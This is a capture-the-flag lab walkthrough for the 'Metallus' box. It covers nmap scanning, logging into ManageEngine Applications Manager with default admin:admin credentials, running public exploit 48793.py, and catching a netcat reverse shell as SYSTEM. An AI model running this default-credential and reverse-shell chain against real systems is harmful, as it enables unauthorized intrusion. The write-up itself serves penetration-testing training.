Metallus
Exploitation Guide for Metallus
Last updated
Was this helpful?
Exploitation Guide for Metallus
Last updated
Was this helpful?
We will exploit the vulnerable web application which has default credential to get the RCE.
# Nmap full tcp
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/metallus/scans]
└─$ sudo nmap $ip -p- --vv --reason -sVS -Pn
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
5040/tcp open unknown syn-ack ttl 127
12000/tcp open cce4x? syn-ack ttl 127
22222/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_8.1 (protocol 2.0)
40443/tcp open unknown syn-ack ttl 127
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49832/tcp open tcpwrapped syn-ack ttl 127
49853/tcp open java-rmi syn-ack ttl 127 Java RMI
49879/tcp open unknown syn-ack ttl 127
49944/tcp open unknown syn-ack ttl 127
49945/tcp open unknown syn-ack ttl 127
Detailed scan on ports reveals http service running on port 40443
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/metallus/scans] [116/553]
└─$ nmap $ip -p 40443,49853,49832 -A -Pn
PORT STATE SERVICE VERSION
40443/tcp open unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Set-Cookie: JSESSIONID_APM_40443=663DA4E3DAC70C0C4A07F4810818803E; Path=/; HttpOnly
| Accept-Ranges: bytes
| ETag: W/"261-1591076589000"
| Last-Modified: Tue, 02 Jun 2020 05:43:09 GMT
| Content-Type: text/html
| Content-Length: 261
| Date: Tue, 24 Aug 2021 05:38:58 GMT
| Connection: close
| Server: AppManager
| <!-- $Id$ -->
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
| <html>
| <head>
| <!-- This comment is for Instant Gratification to work applications.do -->
| <script>
| window.open("/webclient/common/jsp/home.jsp", "_top");
| </script>
. . .Its a application manager.
Successfully logged in with credential admin:admin
Look for known exploits.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/metallus/exploit]
└─$ searchsploit manageengine 14700
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated) | java/webapps/48793.py
ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload | jsp/webapps/29674.txt
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsApplication manager is vulnerable to authenticated RCE. Since we know valid credential we will use this exploit to get the shell. Copy the exploit to your working directory.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/metallus/exploit]
└─$ searchsploit -m java/webapps/48793.py
Exploit: ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/48793
Path: /usr/share/exploitdb/exploits/java/webapps/48793.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/kali/oscp/boxes/pg/metallus/exploit/48793.pyThe script require javac . Install it using following command:
Sudo apt install default-jdk
or
sudo apt install openjdk-11-jdkNow start a netcat listener and run the script.
# change ip and port according to your need
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/metallus/exploit]
└─$ sudo python3 48793.py http://192.168.245.96:40443 admin admin 192.168.49.245 443
[*] Visiting page to retrieve initial cookies...
[*] Retrieving admin cookie...
[*] Getting base directory of ManageEngine...
[*] Found base directory: C:\Program Files\ManageEngine\AppManager14
[*] Creating JAR file...
added manifest
adding: weblogic/jndi/Environment.class(in = 1844) (out= 1081)(deflated 41%)
[*] Uploading JAR file...
[*] Attempting to upload JAR directly to targeted Weblogic folder...
[!] Failed to upload JAR directly, continue to add and execute job to move JAR...
[*] Creating a task to move the JAR file to relative path: classes/weblogic/version8/...
[*] Found actionname: move_weblogic_jar3229 with found actionid 10000003
[*] Executing created task with id: 10000003 to copy JAR...
[*] Task 10000003 has been executed successfully
[*] Deleting created task as JAR has been copied...
[*] Running the Weblogic credentialtest which triggers the code in the JAR...
[*] Check your shell...You will get the shell as root.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/metallus/scans]
└─$ sudo nc -nvlp 443 1 ⨯
[sudo] password for imtodess:
listening on [any] 443 ...
connect to [192.168.49.245] from (UNKNOWN) [192.168.245.96] 49815
Microsoft Windows [Version 10.0.18362.1082]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files\ManageEngine\AppManager14\working>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
<Redacted>
